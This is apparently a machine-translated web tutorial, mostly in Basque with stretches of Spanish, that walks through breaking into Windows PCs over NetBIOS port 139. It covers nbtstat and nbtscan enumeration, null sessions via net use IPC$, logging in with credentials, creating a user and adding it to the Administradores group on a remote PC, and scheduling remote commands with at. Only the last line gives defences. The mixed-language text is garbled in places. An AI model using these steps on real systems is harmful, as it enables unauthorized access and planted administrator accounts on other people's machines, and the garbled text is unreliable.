Hacking con NetBIOS
Web honetan NetBIOS erabilita urrutiko PC batetik datu guztiak ateratzeko modu desberdinak erakutsiko dira.
Lehenik eta behin, konektatu nahi dugun ordenagailuak NetBIOS portua ireki duela egiaztatu behar da, el ataria da 139; MSDOSeko kontsolatik komando honekin egin daiteke: telnet IP_KOKAPENA 139 eta konekta daitekeenez, ireki izango du eta bestela, beste PC bat bilatu beharko da.
Bigarrenik garrantzitsuena da NetBios taula, honek urruneko ordenagailuak zein zerbitzu martxan dituen erakutsiko digu, geroago lortutako emaitzekin komando gehiagorekin egiaztatuko duguna
|
Izena
|
Azpidokomeroa
|
Tipo
|
Zerbitzua
|
| <computername> |
00
|
U
|
Workstation Zerbitzua |
| <computername> |
01
|
U
|
Messenger Zerbitzua |
| <_MSBROWSE_> |
01
|
G
|
Master Arakatzailea |
| <computername> |
03
|
U
|
Messenger Zerbitzua |
| <computername> |
06
|
U
|
RAS Zerbitzaria Zerbitzua |
| <computername> |
1F
|
U
|
NetDDE Zerbitzua |
| <computername> |
20
|
U
|
Fitxategien Zerbitzaria Zerbitzua |
| <computername> |
21
|
U
|
RAS Bezero Zerbitzua |
| <computername> |
22
|
U
|
Exchange Trukea |
| <computername> |
23
|
U
|
Exchange Denda |
| <computername> |
24
|
U
|
Exchange Direktorioa |
| <computername> |
30
|
U
|
Modem Sharing Zerbitzaria Zerbitzua |
| <computername> |
31
|
U
|
Modem Sharing Bezero Zerbitzua |
| <computername> |
43
|
U
|
SMS Bezero Urruneko Kontrola |
| <computername> |
44
|
U
|
SMS Administratzaile Urruneko Kontrola Tresna |
| <computername> |
45
|
U
|
SMS Bezero Urruneko Txatak |
| <computername> |
46
|
U
|
SMS Bezeroaren Urruneko Transferentzia |
| <computername> |
4C
|
U
|
DEC Pathworks TCPIP Zerbitzua |
| <computername> |
52
|
U
|
DEC Pathworks TCPIP Zerbitzua |
| <computername> |
87
|
U
|
Exchange MTA |
| <computername> |
6A
|
U
|
Exchange IMC |
| <computername> |
BE
|
U
|
Sare Monitor Agentea |
| <computername> |
BF
|
U
|
Sare Monitor Aplikazioak |
| <username> |
03
|
U
|
Messenger Zerbitzua |
| <domain> |
00
|
G
|
Domain Name |
| <domain> |
1B
|
U
|
Domeinu Maisu Nabigatzailea |
| <domain> |
1C
|
G
|
Domain Controllers |
| <domain> |
1D
|
U
|
Master Arakatzailea |
| <domain> |
1E
|
G
|
Nabigatzaile Zerbitzuen Hauteskundeak |
| <INet~Zerbitzuak> |
1C
|
G
|
Internet Information Server |
| <IS~Ordenagailu_izen> |
00
|
U
|
Internet Information Server |
MSDOS komando honekin urruneko makina zer zerbitzu exekutatzen dituen jakin dezakegu: nbtstat -A IP HELBIDEA edo nbtstat -a ORDENAGAILU IZENA. Honetaz gain helbidea ere emango digu MAC interesa izango balitz bezala.
![]() Irudian ikus dezakegunez, egiten dugu nbtstat IP edo ordenagailu izen baterako eta emaitza horiek ematen dizkigu, NetBIOS taularenarekin alderatzen ditugu eta datu interesgarriak ateratzen ditugu, hala nola bere erabiltzailea, domeinuari dagokiona… eta domeinu kontrolatzailea balitz, zerbitzuak exekutatzen dituen ikusiko genuke. |
Zer deitzen zaion ezartzeko saio hutsa, komando hau exekutatu behar dugu: net use IP HELBIDEA IPC$ “”/u:”” . Lo que realmente hace este comando es autenticarse en el PC remoto con el usuario anonimo.
Para autenticarnos en un equipo remoto con un usuario en concreto: net use DIRECCIONIP /u:USUARIO CONTRASEÑA edo net use DIRECCIONIPC$ /u:USUARIO CONTRASEÑA edo net use DIRECCIONIPRECURSO /u:USUARIO CONTRASEÑA… Una vez autenticados en el host remoto para ver el contenido de la carpeta se puede hacer net view DIRECTIONIP y veremos el contenido via MSDOS, pero también puedes hacer, INICIO > EJECUTAR y pones lo que quieras: DIRECCIONIP o DIRECCIONIPRECURSO y te mostrará con la ventana del explorador de Windows el content.
Ver la hora remota: net time DIRECCIONIP
Ver dominios disponibles: net view /domain
Ver equipos de un dominio concreto: net view /domain:BUJARRA
Ver los usuarios de un equipo: net user
Ver los detalles de un usuario: net user nombreusuario
Crear un usuario: net user nombreusuario contraseña /ADD (AT komandoarekin urruneko PC batean erabiltzaile bat sortzeko aproposa)
Erabiltzaile bat ezabatu: net user nombreusuario /DELETE
PC baten taldeak ikusi: net group
Erabiltzaile bat talde batean sartu: net group nombregrupo nombreusuario /ADD (Urruneko PC batean sortu dugun erabiltzailea Administradores taldean sartzeko aproposa)
Erabiltzaile bat talde batetik ateratzea: net group nombregrupo nombreusuario /DELETE
Komandoa AT, urruneko gauzak exekutatzeko. Con el comando at DIRECCIONIP bere ekipoko programatutako zereginak ikusiko ditugu eta komandoarekin at DIRECCIONIP 21:30 /INTERACTIVE “MS-DOS komandoa urruneko PC-an exekutatzeko”. Aurreko komandoko balioa 21:30 MS-DOS komandoa exekutatzeko jarri dudan ordua da, komatxoen artean doana, beraz, edozein ordu jar diezaiokezu, baina lehenago hobeto begiratu zein den ordua!
MS Windows Baliabide Kitzaren tresna nltest.rar ikusi domeinu jakin bateko domeinu kontrolatzaileak, ejemplo:
C:>nltest /dclist:bujarra.com
Domeinuko DCS zerrendatu bujarra.com-en
bujarra01
Interesgarria litzatekeprograma da Nbtscan eta egiten duena da ‘nbtstat’ sare oso baten bidez abiadura izugarrian. Adibidea:
C:>nbtscan 192.168.0.0/24
&NBT izenen eskaneaketa egiten ari da helbideetarako 192.168.0.0/24
&IP helbidea &NetBIOS Zerbitzaria &Zerbitzaria &Erabiltzailea &MAC helbidea
 —————————————————————————–
&192.168.0.0 &Bidaltzea huts egin du: Eskaeratutako helbidea ezin da esleitu
&192.168.0.1 &BUJARRA01 <zerbitzaria> <ezezaguna> &00-e0-7d-78-11-e6
&192.168.0.13 &MARIA <zerbitzaria> &MARIA &00-e0-7d-76-5a-2b
&192.168.0.55 &VICETOPC <zerbitzaria> &VICETO 00-00-f8-30-fa-23
&192.168.0.100 &Jasotzea huts egin du: Konexioa puntuak berreskuratu du
Hori egiteko babestu eraso mota hauetatik, edo atea itxi behar dugu 139 routerrean, edo XP-n firewall-a gaituko dugu edo Microsoft sareetarako karpeta eta inprimagailuen partekatzeko zerbitzua kenduko dugu (edozein S.O-tan. de Microsoft).









































